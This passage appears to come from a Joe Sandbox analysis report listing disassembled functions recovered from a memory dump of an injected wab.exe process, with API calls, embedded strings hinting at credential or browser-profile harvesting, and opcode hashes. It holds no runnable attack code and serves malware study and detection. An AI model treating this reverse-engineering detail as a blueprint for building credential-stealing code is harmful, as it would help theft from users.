                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                              • EndDialog.USER32(?,00000002), ref: 00405C83
                                                              • EndDialog.USER32(?,00000001), ref: 00405C98
                                                                • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                                • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                              • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                              • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: Item$Dialog$MessageSend
                                                              • String ID:
                                                              • API String ID: 3975816621-0
                                                              • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                              • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                                              • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                              • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                                              Function 00444C89 Relevance: 12.2, APIs: 3, Strings: 5, Instructions: 154COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _wcsicmp.MSVCRT ref: 00444D09
                                                              • _wcsicmp.MSVCRT ref: 00444D1E
                                                              • _wcsicmp.MSVCRT ref: 00444D33
                                                                • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: _wcsicmp$wcslen$_memicmp
                                                              • String ID: .save$http://$https://$log profile$signIn
                                                              • API String ID: 1214746602-2708368587
                                                              • Opcode ID: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                              • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                                              • Opcode Fuzzy Hash: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                              • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                                              Function 00405DD1 Relevance: 12.1, APIs: 8, Instructions: 100windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                              • String ID:
                                                              • API String ID: 2313361498-0
                                                              • Opcode ID: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
                                                              • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                                              • Opcode Fuzzy Hash: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
                                                              • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                                              Function 00405F4E Relevance: 12.1, APIs: 8, Instructions: 89windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetClientRect.USER32(?,?), ref: 00405F65
                                                              • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                              • GetWindow.USER32(00000000), ref: 00405F80
                                                                • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                              • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                              • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                              • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                              • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                                              • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: Window$ItemMessageRectSend$Client
                                                              • String ID:
                                                              • API String ID: 2047574939-0
                                                              • Opcode ID: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                              • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                                              • Opcode Fuzzy Hash: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                              • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                                              Function 0041881C Relevance: 12.1, APIs: 8, Instructions: 70timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                              • String ID:
                                                              • API String ID: 4218492932-0
                                                              • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                              • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                              • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                              • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                              Function 0044A7C0 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 203COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A75D
                                                                • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A7AA
                                                              • memcpy.MSVCRT ref: 0044A8BF
                                                              • memcpy.MSVCRT ref: 0044A90C
                                                              • memcpy.MSVCRT ref: 0044A988
                                                                • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A422
                                                                • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A46E
                                                              • memcpy.MSVCRT ref: 0044A9D8
                                                              • memcpy.MSVCRT ref: 0044AA19
                                                              • memcpy.MSVCRT ref: 0044AA4A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memcpy$memset
                                                              • String ID: gj
                                                              • API String ID: 438689982-4203073231
                                                              • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                              • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                              • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                              • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                              Function 00430C36 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 135COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memcpy
                                                              • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                              • API String ID: 3510742995-2446657581
                                                              • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                              • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                                              • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                              • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                                              Function 00405A0E Relevance: 10.6, APIs: 7, Instructions: 125windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                              • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                              • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                              • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                              • memset.MSVCRT ref: 00405ABB
                                                              • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                              • SetFocus.USER32(?), ref: 00405B76
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$FocusItemmemset
                                                              • String ID:
                                                              • API String ID: 4281309102-0
                                                              • Opcode ID: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                              • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                                              • Opcode Fuzzy Hash: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                              • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                                              Function 0040FA33 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 103COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: _snwprintfwcscat
                                                              • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                              • API String ID: 384018552-4153097237
                                                              • Opcode ID: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                              • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                                              • Opcode Fuzzy Hash: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                              • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                                              Function 0040D7A7 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ItemMenu$CountInfomemsetwcschr
                                                              • String ID: 0$6
                                                              • API String ID: 2029023288-3849865405
                                                              • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                              • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                              • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                              • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                              Function 0040541F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 78COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                              • memset.MSVCRT ref: 00405455
                                                              • memset.MSVCRT ref: 0040546C
                                                              • memset.MSVCRT ref: 00405483
                                                              • memcpy.MSVCRT ref: 00405498
                                                              • memcpy.MSVCRT ref: 004054AD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memset$memcpy$ErrorLast
                                                              • String ID: 6$\
                                                              • API String ID: 404372293-1284684873
                                                              • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                              • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                              • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                              • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                              Function 0040A06C Relevance: 10.6, APIs: 7, Instructions: 63timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                              • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                              • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                              • wcscpy.MSVCRT ref: 0040A0D9
                                                              • wcscat.MSVCRT ref: 0040A0E6
                                                              • wcscat.MSVCRT ref: 0040A0F5
                                                              • wcscpy.MSVCRT ref: 0040A107
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                              • String ID:
                                                              • API String ID: 1331804452-0
                                                              • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                              • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                              • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                              • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                              Function 00404363 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                              • String ID: advapi32.dll
                                                              • API String ID: 2012295524-4050573280
                                                              • Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                              • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                              • Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                              • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                              Function 00410030 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              • <?xml version="1.0" ?>, xrefs: 0041007C
                                                              • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                              • <%s>, xrefs: 004100A6
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memset$_snwprintf
                                                              • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                              • API String ID: 3473751417-2880344631
                                                              • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                              • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                              • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                              • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                              Function 0040A178 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: wcscat$_snwprintfmemset
                                                              • String ID: %2.2X
                                                              • API String ID: 2521778956-791839006
                                                              • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                              • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                              • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                              • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                              Function 0040D5D6 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: _snwprintfwcscpy
                                                              • String ID: dialog_%d$general$menu_%d$strings
                                                              • API String ID: 999028693-502967061
                                                              • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                              • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                              • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                              • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                              Function 00408D96 Relevance: 10.2, APIs: 8, Instructions: 159stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memcpy$memsetstrlen
                                                              • String ID:
                                                              • API String ID: 2350177629-0
                                                              • Opcode ID: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                              • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                                              • Opcode Fuzzy Hash: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                              • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                                              Function 0042ADCD Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 217COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memset
                                                              • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                              • API String ID: 2221118986-1606337402
                                                              • Opcode ID: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                              • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                                              • Opcode Fuzzy Hash: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                              • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                                              Function 00408F2F Relevance: 9.1, APIs: 6, Instructions: 119COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memcmpmemset$_mbscpymemcpystrlen
                                                              • String ID:
                                                              • API String ID: 265355444-0
                                                              • Opcode ID: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                              • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                                                              • Opcode Fuzzy Hash: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                              • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                                                              Function 0040C3C3 Relevance: 9.1, APIs: 6, Instructions: 109registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                                                • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                                                • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                • Part of subcall function 0040A9CE: ??3@YAXPAX@Z.MSVCRT ref: 0040A9DD
                                                              • memset.MSVCRT ref: 0040C439
                                                              • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                              • _wcsupr.MSVCRT ref: 0040C481
                                                                • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                              • memset.MSVCRT ref: 0040C4D0
                                                              • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ??3@$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                              • String ID:
                                                              • API String ID: 1973883786-0
                                                              • Opcode ID: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                                              • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                              • Opcode Fuzzy Hash: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                                              • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                              Function 004116DD Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 82COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 004116FF
                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                                • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                                                                • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                                                                • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                              • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                              • API String ID: 2618321458-3614832568
                                                              • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                              • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                              • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                              • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                              Function 004185CA Relevance: 9.1, APIs: 6, Instructions: 78COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 004185FC
                                                              • GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 0041860A
                                                              • ??3@YAXPAX@Z.MSVCRT ref: 00418650
                                                              Memory Dump Source
